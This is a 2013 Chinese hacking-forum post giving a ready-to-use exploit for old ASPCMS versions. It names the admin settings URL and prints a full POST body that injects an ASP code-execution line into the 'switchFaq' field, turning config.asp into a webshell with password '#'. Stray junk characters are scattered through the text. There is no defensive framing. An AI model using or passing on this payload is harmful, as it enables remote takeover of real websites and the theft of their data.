中国网络渗透测试联盟

标题: ASPCMS 老版本秒杀拿SHELL [打印本页]
作者: admin    时间: 2013-2-4 16:18
标题: ASPCMS 老版本秒杀拿SHELL
老的ASPCMS版本的秒杀拿SHELL漏洞- o# p! F0 {; K6 v0 j& C

! p+ R5 h& F' [( Z* |5 k0 X; T 找到后台。。。然后$ v. m7 Y0 ^5 i7 q
9 w# g+ U9 t; ?" a% A# q
/admin/_system/AspCms_SiteSetting.asp?action=saves
% _# B' Q" q* `( y # [, l5 O8 E# z& H3 D" l/ H5 A7 w' `
直接POST# f) F8 I, `6 X, j( W5 A7 I% j: H

6 i6 r0 e+ ^% T0 s) VrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1+ x8 E" \- k1 c. T$ ^5 o3 }$ E# K. b
$ H4 _- E9 ]# X+ M  V; D! T: C- N& V1 |, e
再连接配置文件config.asp 密码为#
( {8 p( c% I7 J4 U' J9 H2 a



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2